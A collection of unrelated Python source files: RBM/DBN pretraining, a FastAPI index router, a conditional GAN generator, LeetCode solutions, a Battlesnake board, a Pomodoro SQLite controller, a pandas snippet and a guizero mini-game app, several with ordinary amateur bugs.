def pretrain_rbm(self, graph, rbm, X_train, X_validation):
rbm.train(X_train, X_validation)
X_train_next = rbm.transform(graph, X_train)
X_validation_next = rbm.transform(graph, X_validation)
return X_train_next, X_validation_next
def train(self, mode=TRAIN_MODE_NEW, ckpt_file='work/dbn.ckpt'):
X_train, y_train, X_validation, y_validation, \
X_test, y_test, mnist = self.load_datasets()
self.pretrain(X_train, X_validation)
if self.mlp_engine is None:
self.mlp_engine = Mlp_Engine(self.rbms, 'datasets')
self.mlp_engine.train()
def load_datasets(self):
mnist = input_data.read_data_sets(self.datasets_dir,
one_hot=True)
X_train = mnist.train.images
y_train = mnist.train.labels
X_validation = mnist.validation.images
y_validation = mnist.validation.labels
X_test = mnist.test.images
y_test = mnist.test.labels
return X_train, y_train, X_validation, y_validation, \
X_test, y_test, mnist |
import logging
from typing import List
from fastapi import APIRouter, Depends, HTTPException, Response, status, Request
from fastapi.param_functions import Body, Path
from ..models.embedding import DocumentEmbedding
from ..models.httperror import HTTPError
from ..models.index import Index, IndexRequest, IndexStatus
from .dependencies import get_search_client, get_storage_connector, client_credentials, get_mongo_client
from ..core.es.connector import ElasticsearchConnector
from ..core.mongo import MongoClient
logger = logging.getLogger(__name__)
router = APIRouter(tags=["Indices"])
binding_item_type = 'index'
@router.get(
"",
summary="Lists all indices of a datastore",
description="Returns a list of all indices in a datastore.",
responses={
200: {
"description": "List of all indices found",
"model": List[Index],
}
},
)
async def get_all_indices(
datastore_name: str = Path(..., description="Datastore name"),
conn=Depends(get_storage_connector),
):
indices = await conn.get_indices(datastore_name)
return indices
@router.get(
"/{index_name}",
summary="Get an index by its name",
description="Returns an index for a datastore given its name.",
responses={
200: {"model": Index, "description": "The requested index"},
404: {
"description": "The requested index does not exist",
"model": HTTPError,
},
},
)
async def get_index(
datastore_name: str = Path(..., description="Name of the datastore"),
index_name: str = Path(..., description="Name of the index"),
conn=Depends(get_storage_connector),
):
index = await conn.get_index(datastore_name, index_name)
if index is None:
raise HTTPException(status_code=404, detail="Index not found.")
else:
return index
@router.put(
"/{index_name}",
summary="Creates a new index or updates it if it exists",
description="Creates a new index in the specified datastore of a index with that name allready exists it is updated to the given configuration",
responses={
200: {"model": Index, "description": "The configuration of the updated index"},
201: {"model": Index, "description": "The configuration of the created index"},
400: {"model": HTTPError, "description": "The creation of the index failed in the API database"},
500: {"model": HTTPError, "description": "The update of the index failed in VESPA"},
},
)
async def put_index(
request: Request,
datastore_name: str = Path(..., description="Name of the datastore"),
index_name: str = Path(..., description="Name of the index"),
index_request: IndexRequest = Body(..., description="The index configuration as IndexRequest"),
conn: ElasticsearchConnector = Depends(get_storage_connector),
response: Response = None,
mongo: MongoClient = Depends(get_mongo_client)
):
index = await conn.get_index(datastore_name, index_name)
if index is None:
# creating a new index
new_index = index_request.to_index(datastore_name, index_name)
success = await conn.add_index(new_index) is not None
response.status_code = status.HTTP_201_CREATED
if success:
await mongo.new_binding(request, index_name, binding_item_type) # It should be placed after conn.add_datastore to make sure the status consistent between conn.add_datastore and mongo.new_binding
else:
await mongo.autonomous_access_checking(request, index_name, binding_item_type)
new_index = index_request.to_index(datastore_name, index_name)
success = await conn.update_index(new_index)
response.status_code = status.HTTP_200_OK
if success:
await conn.commit_changes()
return new_index
else:
raise HTTPException(status_code=400)
@router.get(
"/{index_name}/status",
summary="Gets the status of an index",
description="Returns whether an index is currently available for search.",
responses={
200: {"model": IndexStatus, "description": "Index status information."},
404: {
"description": "The requested index does not exist",
"model": HTTPError,
},
},
)
async def get_index_status(
datastore_name: str = Path(..., description="Name of the datastore"),
index_name: str = Path(..., description="Name of the index"),
conn=Depends(get_storage_connector),
dense_retrieval=Depends(get_search_client),
credential_token=Depends(client_credentials)
):
index = await conn.get_index(datastore_name, index_name)
if index is None:
raise HTTPException(status_code=404, detail="Index not found.")
else:
is_available = await dense_retrieval.status(datastore_name, index_name, credential_token)
return IndexStatus(is_available=is_available)
@router.delete(
"/{index_name}",
summary="Delete an index",
description="Deletes the index with the corresponding name and all embeddings contained in the index",
responses={
204: {"description": "Successfully deleted index"},
404: {"model": HTTPError, "description": "Failed to delete index in API database"},
500: {"model": HTTPError, "description": "Failed to delete index in the storage backend."},
},
)
async def delete_index(
request: Request,
datastore_name: str = Path(..., description="The name of the datastore"),
index_name: str = Path(..., description="The name of the index"),
conn: ElasticsearchConnector = Depends(get_storage_connector),
mongo: MongoClient = Depends(get_mongo_client)
):
if not (await conn.get_index(datastore_name, index_name)):
raise HTTPException(status_code=404)
await mongo.autonomous_access_checking(request, index_name, binding_item_type)
success = await conn.delete_index(datastore_name, index_name)
if success:
await mongo.delete_binding(request, index_name, binding_item_type)
await conn.commit_changes()
return Response(status_code=204)
else:
raise HTTPException(status_code=404)
@router.get(
"/{index_name}/embeddings/{doc_id}",
summary="Get embedding for a document",
description="Returns the embedding for a document in the indexwith the given id",
responses={
200: {"model": DocumentEmbedding, "description": "The embedding for the document with the given id"},
404: {"model": HTTPError, "description": "Failed to find embedding for document with given id"},
},
response_model=DocumentEmbedding,
)
async def get_document_embedding(
datastore_name: str = Path(..., description="The name of the datastore"),
index_name: str = Path(..., description="The name of the index"),
doc_id: str = Path(..., description="The id of the document"),
dense_retrieval=Depends(get_search_client),
):
try:
embedding = await dense_retrieval.get_document_embedding(datastore_name, index_name, doc_id)
return DocumentEmbedding(id=doc_id, embedding=embedding)
except ValueError as ex:
raise HTTPException(status_code=404, detail=str(ex))
except Exception as ex:
raise HTTPException(status_code=500, detail=str(ex))
# TODO
# @router.post("/{index_name}/indexing")
# async def update_index(
# datastore_name: str = Path(...), index_name: str = Path(...), reindex: str = Path(...), filtering: list = Body([])
# ):
# pass
|
import os
import numpy as np
import tensorflow as tf
import tensorflow_probability as tfp
import tempfile
try:
from misc import *
from decoder_generator_base import DecoderGenerator
except ImportError:
from .misc import *
from .decoder_generator_base import DecoderGenerator
class cDecoderGenerator(DecoderGenerator):
"""
NOTE: Current code requires that the generator output has the same format as
the discriminator input, including any conditioning. I.e. the generator must
output the same conditions it used as input, to bypass it to the critic.
"""
def __init__(self, data_sampler, **kw):
super().__init__( data_sampler, **kw )
# When set to True, must specify
self.use_same_real_fake_conditioning = retrieve_kw(kw, 'use_same_real_fake_conditioning', True )
if self.use_same_real_fake_conditioning is False:
raise NotImplementedError("use_same_real_fake_conditioning must be set to True.")
# Supposed to sample all info except the latent space
self.generator_sampler = retrieve_kw(kw, 'generator_sampler', None )
def sample_generator_input(self, sampled_input = None, latent_data = None, n_samples = None, ds = None):
"""
Sample condition and latent data.
- sampled_input: extract condition from sampled_input. To be used when
generator input should be aligned with the data conditions
- latent_data: specify the latent data to be used. If n_samples is
specified and latent_data is larger than it, use first latent samples.
- n_samples: If sampled input and latent_data is not specified, sample
this number of samples from the condition and latent datasets and
return them.
- ds: dataset from which to sample the conditions from when sampled_input
is not specified.
"""
if self.use_same_real_fake_conditioning:
sampler = self.data_sampler
else:
# FIXME note that if use_same_real_fake_conditioning is set to false, the
# generator_sampler is not used when sampled_input is specified.
sampler = self.generator_sampler
if sampled_input is None:
if ds is None:
raise ValueError("ds must be specified if not specifying sampled_input.")
def safe_sampler( iter_prop, sampler ):
try:
sampled_input = next(self.__dict__[iter_prop])
except (StopIteration, KeyError):
self.__dict__[iter_prop] = iter(sampler)
sampled_input = next(self.__dict__[iter_prop])
return sampled_input
if n_samples is None:
if ds == 'train':
sampled_input = safe_sampler("_cached_train_sampler", sampler.evaluation_sampler_from_train_ds)
elif ds == 'val':
sampled_input = safe_sampler("_cached_val_sampler", sampler.evaluation_sampler_from_val_ds)
elif ds == 'test':
sampled_input = safe_sampler("_cached_test_sampler", sampler.evaluation_sampler_from_test_ds)
else:
sampled_input = sampler.sample( n_samples = n_samples, ds = ds )
condition = to_tuple(self.extract_condition_from_generator_input( sampled_input ))
if n_samples is None:
n_samples = condition[0].shape[0]
else:
condition_bs = condition[0].shape[0]
if n_samples < condition_bs:
condition = [c[:n_samples,...] for c in condition]
else:
if n_samples % condition_bs:
raise NotImplementedError("Cannot use non-batch-multiple value for n_samples.")
tile_multiples = [n_samples // condition_bs] + [1]*condition[0].shape[1:].rank
condition = [tf.tile(c,tile_multiples) for c in condition]
if latent_data is None:
latent_data = self.sample_latent( n_samples )
else:
latent_data = latent_data[:n_samples,...]
generator_input = self.build_generator_input(condition, latent_data)
generator_input = self._ensure_batch_size_dim(self.generator, generator_input)
return generator_input
def get_batch_size_from_data(self,data):
return data[0].shape[0]
def get_non_batch_dimension_size_from_data(self,data):
return data[0].shape[1:]
def extract_condition_from_data(self, data ):
return data[:-1]
def extract_target_space_from_data(self, data ):
return data[-1]
def build_input(self, condition, data):
condition = to_tuple(condition)
data = to_tuple(data)
return condition + data
def extract_condition_from_generator_input(self, data ):
# Assume that condition on generator input has the same position as in data
return self.extract_condition_from_data( data )
def extract_latent_from_generator_input(self, data ):
return data[-1]
def build_generator_input(self, condition, latent):
condition = to_tuple(condition)
latent = to_tuple(latent)
return condition + latent
def _ensure_batch_size_dim(self, model, inputs):
gm_len = len(model.input[0].shape)
gi_len = len(inputs[0].shape)
if gi_len > gm_len:
raise ValueError("Extract generator input with size larger than actual model input")
while gi_len != gm_len:
inputs = [tf.expand_dims(i,axis=0) for i in inputs ]
gi_len = len(inputs[0].shape)
return inputs
def _train_base(self, epoch, step, sample_batch):
# FIXME Ensure that sample generator uses generator conditioning
generator_batch = self.sample_generator_input( sample_batch, ds = "train" )
if (self._n_critic and (step % self._n_critic)) or (step != 0 and self._n_pretrain_critic is not None and step < self._n_pretrain_critic):
# Update only critic
loss_dict = self._train_step(data_batch = sample_batch, gen_batch = generator_batch, critic_only = True)
else:
# Update critic and generator
loss_dict = self._train_step(data_batch = sample_batch, gen_batch = generator_batch, critic_only = False)
return loss_dict
|
# 616. Add Bold Tag in String
# Medium
# 35538FavoriteShare
# Given a string s and a list of strings dict, you need to add a closed pair of bold tag <b> and </b> to wrap the substrings in s that exist in dict. If two such substrings overlap, you need to wrap them together by only one pair of closed bold tag. Also, if two substrings wrapped by bold tags are consecutive, you need to combine them.
# Example 1:
# Input:
# s = "abcxyz123"
# dict = ["abc","123"]
# Output:
# "<b>abc</b>xyz<b>123</b>"
# Example 2:
# Input:
# s = "aaabbcc"
# dict = ["aaa","aab","bc"]
# Output:
# "<b>aaabbc</b>c"
# Note:
# 1. The given dict won't contain duplicates, and its length won't exceed 100.
# 2. All the strings in input have length in range [1, 1000].
class Solution:
def addBoldTag(self, s: str, dict: List[str]) -> str:
bold = [0]*len(s)
for word in dict:
for i in range(len(s)-len(word)+1):
if s[i:i+len(word)] == word:
for j in range(i,i+len(word)):
bold[j] = 1
not_bold = True
result = ""
for i in range(len(s)):
if not_bold:
if bold[i]:
result += "<b>"+s[i]
not_bold = False
else:
result += s[i]
else:
if bold[i]: result += s[i]
else:
result += "</b>"+s[i]
not_bold = True
if not_bold == False: result += "</b>"
return result
|
import numpy
class Solution(object):
def findMedianSortedArrays(self, nums1, nums2):
"""
:type nums1: List[int]
:type nums2: List[int]
:rtype: float
"""
return float(numpy.median(nums1+nums2))
if __name__ == "__main__":
num1 = [1, 2]
num2 = [3, 4]
s = Solution()
print s.findMedianSortedArrays(num1, num2)
# [] [1] return 1 |
from copy import deepcopy
import square
import queue
class Board:
def __init__(self):
self.MOVES = {
"up": self.get_valid_neighbor_up,
"down": self.get_valid_neighbor_down,
"left": self.get_valid_neighbor_left,
"right": self.get_valid_neighbor_right,
}
self.width = -1
self.height = -1
self.food = []
self.snakes = {}
self.squares = []
def parse_board(self, data):
self.width = data["width"]
self.height = data["height"]
self.food = data["food"]
self.snakes = {}
for snake in data["snakes"]:
self.snakes[snake["id"]] = snake
self.squares = []
for i in range(self.width):
column = []
for j in range(self.height):
column.append(square.Square())
self.squares.append(column)
for food in self.food:
self.squares[food["x"]][food["y"]].set_contains_food()
for snake in self.snakes.values():
for i in range(snake["length"]):
body = snake["body"][i]
self.squares[body["x"]][body["y"]].add_snake(
snake["id"], snake["length"]-i, i==0)
def __str__(self):
string = ( f"Width: {self.width}\n"
f"Height: {self.height}\n"
f"Food: {self.food}\n"
f"Snakes: {self.snakes}\n" )
x = 0
for column in self.squares:
y = 0
for square in column:
string += f"[{x},{y}] {square}\n"
y += 1
x += 1
return string
# NAVIGATION
def is_valid_destination(self, snake_id, coordinates, distance):
# check if coordinates are out of bounds
x, y = coordinates
if x < 0 or y < 0 or x >= self.width or y >= self.height:
return False
# check if square contains snake
square = self.squares[x][y]
if square.snakes:
if square.longest_distance_to_vacant() > distance:
return False
return True
def get_valid_neighbor(self, move, snake_id, x, y, distance=1):
return self.MOVES[move](snake_id, x, y, distance)
def get_valid_neighbor_up(self, snake_id, x, y, distance=1):
neighbor = (x, y+1)
return neighbor if self.is_valid_destination(snake_id, neighbor, distance) \
else (None, None)
def get_valid_neighbor_down(self, snake_id, x, y, distance=1):
neighbor = (x, y-1)
return neighbor if self.is_valid_destination(snake_id, neighbor, distance) \
else (None, None)
def get_valid_neighbor_left(self, snake_id, x, y, distance=1):
neighbor = (x-1, y)
return neighbor if self.is_valid_destination(snake_id, neighbor, distance) \
else (None, None)
def get_valid_neighbor_right(self, snake_id, x, y, distance=1):
neighbor = (x+1, y)
return neighbor if self.is_valid_destination(snake_id, neighbor, distance) \
else (None, None)
def get_largest_snakes(self, snake_ids):
max_length = 0
long_snakes = []
for snake_id in snake_ids:
if self.snakes[snake_id]["length"] > max_length:
max_length = self.snakes[snake_id]["length"]
long_snakes = [snake_id]
else:
long_snakes.append(snake_id)
return long_snakes
def simulation_copy(self):
copy = type(self)()
copy.width = self.width
copy.height = self.height
copy.food = deepcopy(self.food)
copy.snakes = deepcopy(self.snakes)
copy.squares = []
for column in self.squares:
column_copy = []
for square in column:
column_copy.append(square.simulation_copy())
copy.squares.append(column_copy)
return copy
def get_distance_to_closest_owned_food(self, snake_id):
closest_food_distance = None
for food in self.food:
x = food["x"]
y = food["y"]
closest_snakes = self.squares[x][y].get_closest_snake()
if snake_id in closest_snakes:
if len(closest_snakes) == 1 or self.get_largest_snakes(closest_snakes) == snake_id:
distance = self.squares[x][y].get_snake_distance(snake_id)
if closest_food_distance is None or distance < closest_food_distance:
closest_food_distance = distance
return closest_food_distance
def calculate_snakes_distances(self, snakes_to_decrement=[]):
for snake in self.snakes.values():
#init queue
bfs_queue = queue.SimpleQueue()
#breath first search for each snake
starting_x = snake["head"]["x"]
starting_y = snake["head"]["y"]
starting_distance = 1
# Decrement the starting values of given snakes to simulate if they had moved in every possible direction the previous turn
if snake["id"] in snakes_to_decrement:
starting_distance = 0
# TODO touches every square at least twice when backtracking
x, y = self.get_valid_neighbor_up(snake["id"], starting_x, starting_y, starting_distance)
if x is not None:
bfs_queue.put({"x":x, "y":y, "depth":1})
x, y = self.get_valid_neighbor_down(snake["id"], starting_x, starting_y, starting_distance)
if x is not None:
bfs_queue.put({"x":x, "y":y, "depth":1})
x, y = self.get_valid_neighbor_left(snake["id"], starting_x, starting_y, starting_distance)
if x is not None:
bfs_queue.put({"x":x, "y":y, "depth":1})
x, y = self.get_valid_neighbor_right(snake["id"], starting_x, starting_y, starting_distance)
if x is not None:
bfs_queue.put({"x":x, "y":y, "depth":1})
# execute queue
while not bfs_queue.empty():
current_item = bfs_queue.get()
current_square = self.squares[current_item["x"]][current_item["y"]]
last_distance = current_square.get_snake_distance(snake["id"])
if last_distance is None:
current_square.set_snake_distance(snake["id"], current_item["depth"])
# now add children to the queue
x, y = self.get_valid_neighbor_up(snake["id"], current_item["x"], current_item["y"], current_item["depth"]+1)
if x is not None:
bfs_queue.put({"x":x, "y":y, "depth":current_item["depth"]+1})
x, y = self.get_valid_neighbor_down(snake["id"], current_item["x"], current_item["y"], current_item["depth"]+1)
if x is not None:
bfs_queue.put({"x":x, "y":y, "depth":current_item["depth"]+1})
x, y = self.get_valid_neighbor_left(snake["id"], current_item["x"], current_item["y"], current_item["depth"]+1)
if x is not None:
bfs_queue.put({"x":x, "y":y, "depth":current_item["depth"]+1})
x, y = self.get_valid_neighbor_right(snake["id"], current_item["x"], current_item["y"], current_item["depth"]+1)
if x is not None:
bfs_queue.put({"x":x, "y":y, "depth":current_item["depth"]+1})
|
#!/usr/bin/env python2.6
# -*- coding: utf-8 -*-
# db.py
# Pomodoro
#
# Created by Roman Rader on 20.08.11.
# New BSD License 2011 Antigluk https://github.com/antigluk/Pomodoro
"""
Data base controller.
"""
from singleton import Singleton
from options import PomodoroOptions, ConfigError
from pomodoro_entity import PomodoroEntity
from sqlite3 import dbapi2 as sqlite
import time
import os
import threading
from NotificationCenter.NotificationCenter import NotificationCenter
from Queue import Empty as QueueEmpty
from Queue import Queue
import logging
logging.getLogger('Pomodoro')
# Producer of tasks
class DataBaseController(object):
"""
Controller for DB. Generator of tasks (DBTask) for DataBaseThread
(producer-consumer pattern), which process it from shared Queue.
"""
__metaclass__ = Singleton
DBREQUEST_TIMEOUT = 5
def __init__(self):
self.queue = Queue()
self.dbThread = DataBaseThread(self.queue)
self.dbThread.start()
NotificationCenter().addObserver(self,self.willQuit,"beforeQuit")
def willQuit(self, obj):
logging.debug("Waiting for finishing all operations with DB...")
self.queue.join()
logging.warn("Terminating DB thread...")
self.dbThread.terminate()
def newPomodoro(self, description):
curtime = str(int(time.time()))
task = DBTask(DBTask.DBTASK_ADD, {"time": curtime,
"desc": description})
self.queue.put(task, True, self.DBREQUEST_TIMEOUT)
self.queue.join()
NotificationCenter().postNotification("dbUpdated", self)
return task.result
def getAllPomodoros(self):
task = DBTask(DBTask.DBTASK_GET_ALL)
self.queue.put(task, True, self.DBREQUEST_TIMEOUT)
self.queue.join()
return task.result
def getPomodoro(self, number):
task = DBTask(DBTask.DBTASK_GET_ONE, {"number": number})
self.queue.put(task, True, self.DBREQUEST_TIMEOUT)
self.queue.join()
return task.result
def pomodoroCount(self):
task = DBTask(DBTask.DBTASK_GET_COUNT)
self.queue.put(task, True, self.DBREQUEST_TIMEOUT)
self.queue.join()
return task.result
def makeDB(self, fileName):
task = DBTask(DBTask.DBTASK_MAKEDB, {"file": fileName})
self.queue.put(task, True, self.DBREQUEST_TIMEOUT)
self.queue.join()
return task.result
# Task for DB
class DBTask(object):
"""Describes task for DataBaseThread"""
DBTASK_NOTASK = 0
DBTASK_ADD = 1
DBTASK_MAKEDB = 2
DBTASK_GET_ALL = 3
DBTASK_GET_COUNT = 4
DBTASK_GET_ONE = 5
def __init__(self, act, parameters=None, callback=None):
self.action = act
self.data = parameters
self.result = None
self.callback = callback
def sendCallback(self):
if self.callback is not None:
self.callback(self)
# Consumer, handler
class DataBaseThread(threading.Thread):
"""
Thread that handles requests to DB.
Contains connection object to SQLite.
Consumer in producer-consumer pattern.
"""
def __init__(self, queue):
threading.Thread.__init__(self)
self.queue = queue
self.conn = None
opts = PomodoroOptions()
self.dbpath = opts.getDBPath(makedbMethod = self.makeNewDB)
logging.debug('Using db file: %s' % self.dbpath)
if self.dbpath is None:
raise ConfigError('No db file')
if not os.path.isfile(self.dbpath):
self.makeNewDB(self.dbpath)
opts.dbpath = self.dbpath
self.__terminated = False
def run(self):
self.connectToDB(self.dbpath)
while not self.__terminated:
try:
task = self.queue.get_nowait()
except QueueEmpty:
continue
ret = None
if task.action == DBTask.DBTASK_ADD:
ret = self.newPomodoro(task.data["time"], task.data["desc"])
logging.debug("New pomodoro written: %s, %s" % ret)
if task.action == DBTask.DBTASK_MAKEDB:
ret = self.makeNewDB(task.data["file"])
if task.action == DBTask.DBTASK_GET_ALL:
ret = self.allPomodoros()
if task.action == DBTask.DBTASK_GET_ONE:
ret = self.getPomodoro(task.data["number"])
if task.action == DBTask.DBTASK_GET_COUNT:
ret = self.pomodoroCount()
task.result = ret
self.queue.task_done()
task.sendCallback()
logging.debug("Data Base Thread terminated")
def connectToDB(self, fname):
self.conn = sqlite.connect(fname)
self.dbpath = fname
NotificationCenter().postNotification("dbConnected", self)
def terminate(self):
self.__terminated = True
# Tasks
def newPomodoro(self, time, description):
if self.conn is None:
connectToDB(self.dbpath)
cur = self.conn.cursor()
cur.execute("insert into pomodoros values (?, ?, NULL)", (time, description))
self.conn.commit()
cur.close()
return (time, description)
def makeNewDB(self, fname):
try:
conn = sqlite.connect(fname)
cur = conn.cursor()
cur.execute('CREATE TABLE pomodoros (finish_time integer, description text, key integer primary key)')
conn.commit()
cur.close()
logging.info("DB Created")
return True
except sqlite3.Error, e:
logging.error("Error while creating db at %s" % fname)
return False
def allPomodoros(self):
logging.info("Getting pomodoros..")
if self.conn is None:
connectToDB(self.dbpath)
cur = self.conn.cursor()
cur.execute("SELECT * FROM pomodoros ORDER BY finish_time ASC")
ret = []
for row in cur:
ret.append(PomodoroEntity(int(row[0]),row[1], row[2]))
self.conn.commit()
cur.close()
logging.debug("Returned %d records" % (len(ret)))
return tuple(ret)
def pomodoroCount(self):
if self.conn is None:
connectToDB(self.dbpath)
cur = self.conn.cursor()
cur.execute("SELECT Count(*) FROM pomodoros")
(count,) = cur.fetchone()
cur.close()
return int(count)
def getPomodoro(self, item):
if self.conn is None:
connectToDB(self.dbpath)
cur = self.conn.cursor()
cur.execute("SELECT * FROM pomodoros ORDER BY finish_time DESC LIMIT ?, 1", [str(item)])
row = cur.fetchone()
ret = PomodoroEntity(int(row[0]), row[1], row[2])
cur.close()
return ret
|
import pandas as pd
'''
df=pd.DataFrame([["jack",24],["rose",18]],columns=["name","age"])
df.to_csv("person.csv")
'''
url="https://github.com/venky14/Machine-Learning-with-Iris-Dataset/blob/master/Iris.csv"
columns=["Id","SepalLengthCm"]
df=pd.read_csv(url,delimiter="\n",names=columns)#index_col=["Id"])
print(df.head(2))
|
# Imports ---------------
from guizero import App, Text, Waffle, Window , PushButton, TextBox, Picture, Box
from random import randint
import random
# ------------------------------
# Variables Flood IT
# ------------------------------
colours = ["red", "blue", "green", "yellow", "magenta", "purple"]
board_size = 14
moves_limit = 25
moves_taken = 0
# ------------------------------
# Functions Flood IT
# ------------------------------
# Recursively floods adjacent squares
def flood(x, y, target, replacement):
# Algorithm from https://en.wikipedia.org/wiki/Flood_fill
if target == replacement:
return False
if board.get_pixel(x, y) != target:
return False
board.set_pixel(x, y, replacement)
if y+1 <= board_size-1: # South
flood(x, y+1, target, replacement)
if y-1 >= 0: # North
flood(x, y-1, target, replacement)
if x+1 <= board_size-1: # East
flood(x+1, y, target, replacement)
if x-1 >= 0: # West
flood(x-1, y, target, replacement)
# Check whether all squares are the same
def all_squares_are_the_same():
squares = board.get_all()
if all(colour == squares[0] for colour in squares):
return True
else:
return False
def win_check():
global moves_taken
moves_taken += 1
if moves_taken <= moves_limit:
if all_squares_are_the_same():
win_text.value = "You win!"
else:
win_text.value = "You lost :("
def fill_board():
for x in range(board_size):
for y in range(board_size):
board.set_pixel(x, y, random.choice(colours))
def init_palette():
for colour in colours:
palette.set_pixel(colours.index(colour), 0, colour)
def start_flood(x, y):
flood_colour = palette.get_pixel(x,y)
target = board.get_pixel(0,0)
flood(0, 0, target, flood_colour)
win_check()
# Variables Destroy The Dots-------------
GRID_SIZE = 5
score = 0
Guadado=0
contador=0
# Functions Destroy The Dots-------------
def add_dot():
x, y = randint(0,GRID_SIZE-1), randint(0,GRID_SIZE-1)
while board1[x, y].dotty == True:
x, y = randint(0,GRID_SIZE-1), randint(0,GRID_SIZE-1)
board1[x, y].dotty = True
board1.set_pixel(x, y, "red")
speed = 1000
if score > 30:
speed = 200
elif score > 20:
speed = 400
elif score > 10:
speed = 500
elif score == -1:
speed=0
all_red = True
for x in range(GRID_SIZE):
for y in range(GRID_SIZE):
if board1[x,y].color != "red":
all_red = False
if all_red:
score_display.value = "You lost! Score: " + str(score)
else:
board1.after(speed, add_dot)
def destroy_dot(x,y):
global score
if board1[x,y].dotty == True:
board1[x,y].dotty = False
board1.set_pixel(x, y, "white")
score += 1
score_display.value = "Your score is " + str(score)
def stop_dot():
board1.set_all("red")
board1.dotty=False
def Continuar_Juego1():
board1.set_all("white")
board1.dotty=False
add_dot()
score_display.value = "Your score is " + str(score)
window_comprobar.hide()
window_game1.show()
def GuardarPartida1():
Guardado=score
board1.set_all("white")
board1.dotty=False
boxdoble.visible=True
Reanudar=PushButton(boxdoble,text="Reanudar última partida",grid=[0,0],command=Continuar_Juego1)
Icono=Text(boxdoble,text="▶",size=40,color="green",grid=[1,0])
window_game1.hide()
window_comprobar.hide()
window_choice.show()
#Funcion de Botones
def mostrar_puntaje():
window_puntaje.show()
def comprobacion():
stop_dot()
window_comprobar.show()
def comprobacion2():
window_comprobar2.show()
def mostrar_login():
window_login.show()
def mostrar_choice():
window_login.hide()
window_choice.show()
def mostrar_registro():
window_login.hide()
window_registro.show()
def iniciar_juego1():
board1.after(100,add_dot)
Iniciar.hide()
def mostrar_juego1():
window_game1.show()
def mostrar_juego2():
window_game2.show()
def cerrar_Splash():
app.hide()
# App -------------------
app = App(bg="Purple",height="700",width="800")
box2=Box(app,width="fill",height="300")
box=Box(app,width="fill",height="fill")
Bienvenida_label=Text(box,text="¡BIENVENIDO!",size=80,color="white",font="Comic Sans MS")
cargando_label=Text(box,text="Loading.....",size=30)
App.after(app,1500,mostrar_login)
#Windows------------------------------------------
window_puntaje = Window(app, bg="medium violet red", title="Puntajes")
window_puntaje.hide()
window_game1 = Window(app, bg="#788199", title="Destroy The dots")
window_game1.hide()
window_game2 = Window(app, bg="#788199", title="Flood It")
window_game2.hide()
window_login = Window(app,bg="medium violet red",title="Pantalla de Login")
window_login.hide()
window_choice = Window(app, bg="bisque", title="Seleccione un Juego")
window_choice.hide()
window_registro= Window(app,bg="bisque", title="Registro")
window_registro.hide()
window_comprobar= Window(app,bg="#666666",title="Dialogbox",height=200,width=350)
window_comprobar.hide()
window_comprobar2= Window(app,bg="#666666",title="Dialogbox",height=200,width=350)
window_comprobar2.hide()
window_administrador=Window(app,bg="#788199",title="Modo Administrador")
window_administrador.hide()
#Destroy The Dots
titulo=Text(window_game1,text="🅳🅴🆂🆃🆁🅾🆈 🆃🅷🅴 🅳🅾🆃🆂",size=30)
instructions = Text(window_game1, text="Click the dots to destroy them")
board1 = Waffle(window_game1, width=GRID_SIZE, height=GRID_SIZE, command=destroy_dot)
score_display = Text(window_game1, text="Your score is " + str(score))
box=Box(window_game1,width="fill",height="20")
Iniciar=PushButton(window_game1,text="Iniciar Juego",command=iniciar_juego1)
box=Box(window_game1,width="fill",height="20")
Detener=PushButton(window_game1,text="Finalizar Juego",command=comprobacion)
#Flood IT
titulo=Text(window_game2,text="🅵🅻🅾🅾🅳 🅸🆃",size=30)
board = Waffle(window_game2, width=board_size, height=board_size, pad=0)
palette = Waffle(window_game2, width=6, height=1, dotty=True, command=start_flood)
win_text = Text(window_game2)
box=Box(window_game2,width="fill",height="20")
Detener=PushButton(window_game2,text="Finalizar Juego",command=comprobacion2)
fill_board()
init_palette()
#Window_login
box=Box(window_login,width="fill",height=200)
text_nombre=Text(window_login,text="Ingrese su nombre de usuario",color="White",size=10)
nombre=TextBox(window_login,text="Nombre usuario",width=30)
box=Box(window_login,width="fill",height=30)
text_nombre=Text(window_login,text="Ingrese su contraseña",color="White",size=10)
contrasena=TextBox(window_login,text="Ingrese su Contraseña",width=30,hide_text=True)
box=Box(window_login,width="fill",height=30)
ingresar_button = PushButton(window_login, text="Ingresar", command=mostrar_choice)
box=Box(window_login,width="fill",height=30)
registrar_button = PushButton(window_login, text="Registrar",command=mostrar_registro)
#Window_choice
box=Box(window_choice,width="fill",height=120)
#Llamar a la base de datos y pasarle el dato de score
if(score==0):
boxdoble=Box(window_choice,width=190,height=60 ,layout="grid",grid=[0,0],visible=False)
Reanudar=PushButton(boxdoble,text="Reanudar última partida",grid=[0,0])
Icono=Text(boxdoble,text="▶",size=40,color="green",grid=[1,0])
else:
boxdoble=Box(window_choice,width=190,height=60 ,layout="grid",grid=[0,0],visible=True)
Reanudar=PushButton(boxdoble,text="Reanudar última partida",grid=[0,0],command=Continuar_Juego1)
Icono=Text(boxdoble,text="▶",size=40,color="green",grid=[1,0])
window_game1.hide()
window_comprobar.hide()
window_choice.show()
box=Box(window_choice,width="fill",height=30)
boxdoble2=Box(window_choice,width=220,height=60 ,layout="grid",grid=[0,0])
Destroy_button = PushButton(boxdoble2, text="𝘿𝙚𝙨𝙩𝙧𝙤𝙮 𝙏𝙝𝙚 𝘿𝙤𝙩𝙨",grid=[1,0], command=mostrar_juego1)
Icono=Text(boxdoble2,text="🔴",size=30,color="red",grid=[0,0])
Icono=Text(boxdoble2,text="🔴",size=30,color="red",grid=[3,0])
box=Box(window_choice,width="fill",height=30)
boxdoble3=Box(window_choice,width=180,height=60 ,layout="grid",grid=[0,0])
Icono=Text(boxdoble3,text="🌊",size=30,color="blue",grid=[0,0])
Flood_button = PushButton(boxdoble3, text="𝙁𝙡𝙤𝙤𝙙 𝙄𝙩", command=mostrar_juego2,grid=[1,0])
Icono=Text(boxdoble3,text="🌊",size=30,color="blue",grid=[3,0])
box=Box(window_choice,width="fill",height=30)
boxdoble2=Box(window_choice,width=180,height=60 ,layout="grid",grid=[0,0])
Destroy_button = PushButton(boxdoble2, text="Puntajes",grid=[1,0], command=mostrar_puntaje)
Icono=Text(boxdoble2,text="🏆",size=30,color="black",grid=[0,0])
Icono=Text(boxdoble2,text="🏆",size=30,color="black",grid=[3,0])
#Window_Registro
box1=Box(window_registro,width="fill")
back=PushButton(box1,text="🢀",align="left",command=mostrar_login and window_registro.hide)
titulo=Text(window_registro,text="'Ingrese los datos solicitados'",color="Black",size=15)
box1=Box(window_registro,width="fill",height=60)
nombreUsuario=TextBox(window_registro,text="Nombre de Usuario",width=50)
box1=Box(window_registro,width="fill",height=20)
contraseña1=TextBox(window_registro,text="Ingrese Contraseña",width=50)
